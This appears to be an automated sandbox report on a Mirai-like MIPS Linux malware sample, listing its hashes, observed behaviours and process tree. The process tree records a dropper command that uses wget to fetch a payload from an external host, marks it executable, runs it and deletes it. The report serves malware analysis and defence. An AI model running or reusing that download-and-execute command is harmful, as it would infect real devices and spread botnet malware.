Analysis
-
max time kernel
0s -
max time network
124s -
platform
debian-9_mips -
resource
debian9-mipsbe-20221111-en -
resource tags
arch:mipsimage:debian9-mipsbe-20221111-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
04-04-2023 23:57
Behavioral task
behavioral1
Sample
7b5a94a08497c282ff959886f97242f3.elf
Resource
debian9-mipsbe-20221111-en
General
-
Target
7b5a94a08497c282ff959886f97242f3.elf
-
Size
155KB
-
MD5
7b5a94a08497c282ff959886f97242f3
-
SHA1
926fe3a7736bd95aac755c18311c25fde2237ed0
-
SHA256
1ae813f4f927b728994e9d71b130f2ea4026e8d843acc55a567870eababe3a5a
-
SHA512
5dbdf7e24b8b7156f03ce6367fe58ddbe58bfe7b554b21ea9d5aaee0f39ff756be8ef74e003ab3504907e685907b4779662c376bd7cef98d91113cdc43bcf44e
-
SSDEEP
3072:B7esBFP23rWfOB7ZOOyGvWKmrThPaLEne7rNb:1euCloGvrmrThPaLEne7rNb
Malware Config
Signatures
-
Modifies the Watchdog daemon 1 TTPs
Malware like Mirai modify the Watchdog to prevent it restarting an infected system.
-
Modifies hosts file 1 IoCs
Adds to hosts file used for mapping hosts to IP addresses.
Processes:
wgetdescription ioc process /etc/hosts /etc/hosts wget -
Writes DNS configuration 1 TTPs 1 IoCs
Writes data to DNS resolver config file.
-
Reads system routing table 1 TTPs 1 IoCs
Gets active network interfaces from /proc virtual filesystem.
Processes:
7b5a94a08497c282ff959886f97242f3.elfdescription ioc process /proc/net/route /proc/net/route 7b5a94a08497c282ff959886f97242f3.elf -
Reads system network configuration 1 TTPs 1 IoCs
Uses contents of /proc filesystem to enumerate network settings.
Processes:
7b5a94a08497c282ff959886f97242f3.elfdescription ioc process /proc/net/route /proc/net/route 7b5a94a08497c282ff959886f97242f3.elf
Processes
-
/tmp/7b5a94a08497c282ff959886f97242f3.elf/tmp/7b5a94a08497c282ff959886f97242f3.elf1⤵
- Reads system routing table
- Reads system network configuration
PID:324
-
/bin/sh/bin/sh -c "wget -q http://gay.energy/.../vivid -O .....;chmod 777 .....;./.....;rm -rf ....."1⤵PID:325
-
/usr/bin/wgetwget -q http://gay.energy/.../vivid -O .....2⤵
- Modifies hosts file
- Writes DNS configuration
PID:329 -
/bin/chmodchmod 777 .....2⤵PID:333
-
./....../.....2⤵PID:334
-
/bin/sh/bin/sh ./.....2⤵PID:334
-
/bin/rmrm -rf .....2⤵PID:336